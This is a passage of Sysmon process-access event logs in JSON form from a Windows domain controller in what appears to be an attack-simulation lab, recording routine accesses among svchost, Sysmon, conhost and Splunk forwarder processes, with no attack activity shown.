05:51:53.638","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:51:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:51:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4236,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:51:53.638\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:51:53.638","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:51:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:51:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4237,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:51:53.638\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:51:53.638","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:51:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:51:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4238,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:51:53.638\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:51:53.638","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:51:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:51:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4239,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:51:53.638\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:51:53.638","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:51:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:51:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4240,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:51:53.638\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:51:53.638","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:51:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:51:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4241,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:51:53.638\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:51:53.638","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:51:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:51:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4242,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:51:53.638\r\nSourceProcessGUID: {A837DB8D-0239-5F25-0000-00103F1E0500}\r\nSourceProcessId: 2768\r\nSourceThreadId: 2656\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-02F9-5F25-0000-001036350600}\r\nTargetProcessId: 4256\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:51:53.638","SourceProcessGUID":"{A837DB8D-0239-5F25-0000-00103F1E0500}","SourceProcessId":"2768","SourceThreadId":"2656","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-02F9-5F25-0000-001036350600}","TargetProcessId":"4256","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:51:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:51:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4243,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:51:53.778\r\nSourceProcessGUID: {A837DB8D-02F9-5F25-0000-001036350600}\r\nSourceProcessId: 4256\r\nSourceThreadId: 4268\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nTargetProcessGUID: {A837DB8D-0239-5F25-0000-001064190500}\r\nTargetProcessId: 2868\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x101400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+6b453|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+8e8530|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:51:53.778","SourceProcessGUID":"{A837DB8D-02F9-5F25-0000-001036350600}","SourceProcessId":"4256","SourceThreadId":"4268","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","TargetProcessGUID":"{A837DB8D-0239-5F25-0000-001064190500}","TargetProcessId":"2868","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x101400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+6b453|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+8e8530|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:51:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
